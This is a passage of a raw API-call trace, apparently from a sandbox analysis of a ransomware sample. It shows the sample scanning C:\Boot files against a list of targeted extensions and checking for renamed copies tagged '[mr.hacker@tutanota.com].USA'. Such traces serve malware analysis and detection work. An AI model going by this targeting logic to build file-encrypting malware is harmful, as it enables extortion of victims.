hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626848 | out: hHeap=0x5d0000) returned 1 [0034.618] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0034.618] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626870 | out: hHeap=0x5d0000) returned 1 [0034.619] Sleep (dwMilliseconds=0x64) [0034.908] lstrlenW (lpString="BCD") returned 3 [0034.908] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0034.919] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0034.919] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0034.919] lstrlenW (lpString=".doc") returned 4 [0034.919] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0034.919] lstrlenW (lpString=".docx") returned 5 [0034.919] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0034.919] lstrlenW (lpString=".pdf") returned 4 [0034.919] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0034.919] lstrlenW (lpString=".xls") returned 4 [0034.919] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0034.919] lstrlenW (lpString=".xlsx") returned 5 [0034.919] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0034.919] lstrlenW (lpString=".ppt") returned 4 [0034.920] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0034.920] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0034.920] lstrlenW (lpString=".zip") returned 4 [0034.920] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0034.920] lstrlenW (lpString=".rar") returned 4 [0034.920] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0034.920] lstrlenW (lpString=".bz2") returned 4 [0034.920] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0034.920] lstrlenW (lpString=".7z") returned 3 [0034.920] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0034.920] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0034.920] lstrlenW (lpString=".dbf") returned 4 [0034.920] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0034.920] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0034.920] lstrlenW (lpString=".1cd") returned 4 [0034.920] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0034.920] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0034.920] lstrlenW (lpString=".jpg") returned 4 [0034.920] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0034.920] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0034.920] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0034.920] lstrlenW (lpString=".doc") returned 4 [0034.920] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0034.920] lstrlenW (lpString=".docx") returned 5 [0034.920] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0034.920] lstrlenW (lpString=".pdf") returned 4 [0034.920] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0034.920] lstrlenW (lpString=".xls") returned 4 [0034.920] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0034.920] lstrlenW (lpString=".xlsx") returned 5 [0034.920] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0034.920] lstrlenW (lpString=".ppt") returned 4 [0034.920] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0034.920] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0034.921] lstrlenW (lpString=".zip") returned 4 [0034.921] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0034.921] lstrlenW (lpString=".rar") returned 4 [0034.921] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0034.921] lstrlenW (lpString=".bz2") returned 4 [0034.921] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0034.921] lstrlenW (lpString=".7z") returned 3 [0034.921] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0034.921] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0034.921] lstrlenW (lpString=".dbf") returned 4 [0034.921] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0034.921] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0034.921] lstrlenW (lpString=".1cd") returned 4 [0034.921] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0034.921] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0034.921] lstrlenW (lpString=".jpg") returned 4 [0034.921] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0034.921] lstrcmpiW (lpString1=".LOG1", lpString2=".USA") returned -1 [0034.921] lstrlenW (lpString="BCD.LOG1") returned 8 [0034.921] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.922] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=0) returned 1 [0034.922] CloseHandle (hObject=0x19c) returned 1 [0034.922] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0034.922] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0034.922] lstrlenW (lpString=".doc") returned 4 [0034.922] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0034.922] lstrlenW (lpString=".docx") returned 5 [0034.922] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0034.922] lstrlenW (lpString=".pdf") returned 4 [0034.922] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0034.922] lstrlenW (lpString=".xls") returned 4 [0034.922] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0034.922] lstrlenW (lpString=".xlsx") returned 5 [0034.922] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0034.922] lstrlenW (lpString=".ppt") returned 4 [0034.922] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0034.922] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0034.922] lstrlenW (lpString=".zip") returned 4 [0034.922] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0034.922] lstrlenW (lpString=".rar") returned 4 [0034.922] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0034.922] lstrlenW (lpString=".bz2") returned 4 [0034.922] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0034.922] lstrlenW (lpString=".7z") returned 3 [0034.922] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0034.922] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0034.922] lstrlenW (lpString=".dbf") returned 4 [0034.922] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0034.922] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0034.922] lstrlenW (lpString=".1cd") returned 4 [0034.922] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0034.922] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0034.923] lstrlenW (lpString=".jpg") returned 4 [0034.923] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0034.923] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0034.923] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0034.923] lstrlenW (lpString=".doc") returned 4 [0034.923] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0034.923] lstrlenW (lpString=".docx") returned 5 [0034.923] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0034.923] lstrlenW (lpString=".pdf") returned 4 [0034.923] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0034.923] lstrlenW (lpString=".xls") returned 4 [0034.923] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0034.923] lstrlenW (lpString=".xlsx") returned 5 [0034.923] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0034.923] lstrlenW (lpString=".ppt") returned 4 [0034.923] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0034.923] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0034.923] lstrlenW (lpString=".zip") returned 4 [0034.923] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0034.923] lstrlenW (lpString=".rar") returned 4 [0034.923] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0034.923] lstrlenW (lpString=".bz2") returned 4 [0034.923] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0034.923] lstrlenW (lpString=".7z") returned 3 [0034.923] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0034.923] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0034.923] lstrlenW (lpString=".dbf") returned 4 [0034.923] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0034.923] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0034.923] lstrlenW (lpString=".1cd") returned 4 [0034.923] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0034.923] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0034.923] lstrlenW (lpString=".jpg") returned 4 [0034.923] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0034.924] lstrcmpiW (lpString1=".LOG2", lpString2=".USA") returned -1 [0034.924] lstrlenW (lpString="BCD.LOG2") returned 8 [0034.924] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.924] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=0) returned 1 [0034.924] CloseHandle (hObject=0x19c) returned 1 [0034.924] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0034.924] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0034.924] lstrlenW (lpString=".doc") returned 4 [0034.924] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0034.924] lstrlenW (lpString=".docx") returned 5 [0034.924] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0034.924] lstrlenW (lpString=".pdf") returned 4 [0034.924] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0034.924] lstrlenW (lpString=".xls") returned 4 [0034.924] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0034.924] lstrlenW (lpString=".xlsx") returned 5 [0034.924] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0034.924] lstrlenW (lpString=".ppt") returned 4 [0034.924] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0034.924] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0034.924] lstrlenW (lpString=".zip") returned 4 [0034.924] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0034.925] lstrlenW (lpString=".rar") returned 4 [0034.925] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0034.925] lstrlenW (lpString=".bz2") returned 4 [0034.925] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0034.925] lstrlenW (lpString=".7z") returned 3 [0034.925] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0034.925] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0034.925] lstrlenW (lpString=".dbf") returned 4 [0034.925] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0034.925] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0034.925] lstrlenW (lpString=".1cd") returned 4 [0034.925] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0034.925] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0034.925] lstrlenW (lpString=".jpg") returned 4 [0034.925] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0034.925] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0034.925] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0034.925] lstrlenW (lpString=".doc") returned 4 [0034.925] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0034.925] lstrlenW (lpString=".docx") returned 5 [0034.925] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0034.925] lstrlenW (lpString=".pdf") returned 4 [0034.925] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0034.925] lstrlenW (lpString=".xls") returned 4 [0034.925] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0034.925] lstrlenW (lpString=".xlsx") returned 5 [0034.925] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0034.925] lstrlenW (lpString=".ppt") returned 4 [0034.925] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0034.925] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0034.925] lstrlenW (lpString=".zip") returned 4 [0034.925] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0034.926] lstrlenW (lpString=".rar") returned 4 [0034.926] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0034.926] lstrlenW (lpString=".bz2") returned 4 [0034.926] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0034.926] lstrlenW (lpString=".7z") returned 3 [0034.926] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0034.926] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0034.926] lstrlenW (lpString=".dbf") returned 4 [0034.926] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0034.926] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0034.926] lstrlenW (lpString=".1cd") returned 4 [0034.926] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0034.926] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0034.926] lstrlenW (lpString=".jpg") returned 4 [0034.926] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0034.926] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0034.926] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0034.926] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.926] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=89168) returned 1 [0034.927] CloseHandle (hObject=0x19c) returned 1 [0034.927] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0034.927] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.927] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0034.927] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0034.927] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0034.927] lstrlenW (lpString=".doc") returned 4 [0034.927] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0034.927] lstrlenW (lpString=".docx") returned 5 [0034.927] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0034.927] lstrlenW (lpString=".pdf") returned 4 [0034.927] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0034.927] lstrlenW (lpString=".xls") returned 4 [0034.927] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0034.927] lstrlenW (lpString=".xlsx") returned 5 [0034.927] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0034.927] lstrlenW (lpString=".ppt") returned 4 [0034.927] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0034.927] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0034.927] lstrlenW (lpString=".zip") returned 4 [0034.927] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0034.927] lstrlenW (lpString=".rar") returned 4 [0034.927] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0034.927] lstrlenW (lpString=".bz2") returned 4 [0034.927] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0034.927] lstrlenW (lpString=".7z") returned 3 [0034.927] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0034.928] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0034.928] lstrlenW (lpString=".dbf") returned 4 [0034.928] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0034.928] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0034.928] lstrlenW (lpString=".1cd") returned 4 [0034.928] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0034.928] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0034.928] lstrlenW (lpString=".jpg") returned 4 [0034.928] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0034.928] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0034.928] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0034.928] lstrlenW (lpString=".doc") returned 4 [0034.928] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0034.928] lstrlenW (lpString=".docx") returned 5 [0034.928] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0034.928] lstrlenW (lpString=".pdf") returned 4 [0034.928] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0034.928] lstrlenW (lpString=".xls") returned 4 [0034.928] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0034.928] lstrlenW (lpString=".xlsx") returned 5 [0034.928] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0034.928] lstrlenW (lpString=".ppt") returned 4 [0034.928] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0034.928] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0034.928] lstrlenW (lpString=".zip") returned 4 [0034.928] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0034.928] lstrlenW (lpString=".rar") returned 4 [0034.928] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0034.928] lstrlenW (lpString=".bz2") returned 4 [0034.928] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0034.928] lstrlenW (lpString=".7z") returned 3 [0034.928] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0034.928] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0034.928] lstrlenW (lpString=".dbf") returned 4 [0034.929] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0034.929] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0034.929] lstrlenW (lpString=".1cd") returned 4 [0034.929] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0034.929] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0034.929] lstrlenW (lpString=".jpg") returned 4 [0034.929] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0034.929] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0034.929] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0034.929] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.929] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=87616) returned 1 [0034.929] CloseHandle (hObject=0x19c) returned 1 [0034.931] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0034.931] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.931] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0034.931] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0034.931] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0034.931] lstrlenW (lpString=".doc") returned 4 [0034.931] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0034.931] lstrlenW (lpString=".docx") returned 5 [0034.931] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0034.931] lstrlenW (lpString=".pdf") returned 4 [0034.931] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0034.931] lstrlenW (lpString=".xls") returned 4 [0034.931] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0034.931] lstrlenW (lpString=".xlsx") returned 5 [0034.931] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0034.931] lstrlenW (lpString=".ppt") returned 4 [0034.931] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0034.932] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0034.932] lstrlenW (lpString=".zip") returned 4 [0034.932] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0034.932] lstrlenW (lpString=".rar") returned 4 [0034.932] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0034.932] lstrlenW (lpString=".bz2") returned 4 [0034.932] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0034.932] lstrlenW (lpString=".7z") returned 3 [0034.932] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0034.932] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0034.932] lstrlenW (lpString=".dbf") returned 4 [0034.932] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0034.932] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0034.932] lstrlenW (lpString=".1cd") returned 4 [0034.932] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0034.932] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0034.932] lstrlenW (lpString=".jpg") returned 4 [0034.932] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0034.932] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0034.932] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0034.932] lstrlenW (lpString=".doc") returned 4 [0034.932] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0034.932] lstrlenW (lpString=".docx") returned 5 [0034.932] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0034.932] lstrlenW (lpString=".pdf") returned 4 [0034.932] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0034.932] lstrlenW (lpString=".xls") returned 4 [0034.932] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0034.932] lstrlenW (lpString=".xlsx") returned 5 [0034.932] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0034.932] lstrlenW (lpString=".ppt") returned 4 [0034.932] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0034.932] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0034.932] lstrlenW (lpString=".zip") returned 4 [0034.932] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0034.933] lstrlenW (lpString=".rar") returned 4 [0034.933] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0034.933] lstrlenW (lpString=".bz2") returned 4 [0034.933] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0034.933] lstrlenW (lpString=".7z") returned 3 [0034.933] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0034.933] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0034.933] lstrlenW (lpString=".dbf") returned 4 [0034.933] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0034.933] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0034.933] lstrlenW (lpString=".1cd") returned 4 [0034.933] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0034.933] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0034.933] lstrlenW (lpString=".jpg") returned 4 [0034.933] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0034.933] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0034.933] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0034.933] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0034.933] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=91712) returned 1 [0034.933] CloseHandle (hObject=0x19c) returned 1 [0034.933] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0034.934] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.934] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0034.934] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0034.934] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0034.934] lstrlenW (lpString=".doc") returned 4 [0034.934] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0034.934] lstrlenW (lpString=".docx") returned 5 [0034.934] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0034.934] lstrlenW (lpString=".pdf") returned 4 [0034.934] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0034.934] lstrlenW (lpString=".xls") returned 4 [0034.934] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0034.934] lstrlenW (lpString=".xlsx") returned 5 [0034.934] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0034.934] lstrlenW (lpString=".ppt") returned 4 [0034.934] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0034.934] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0034.934] lstrlenW (lpString=".zip") returned 4 [0034.934] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 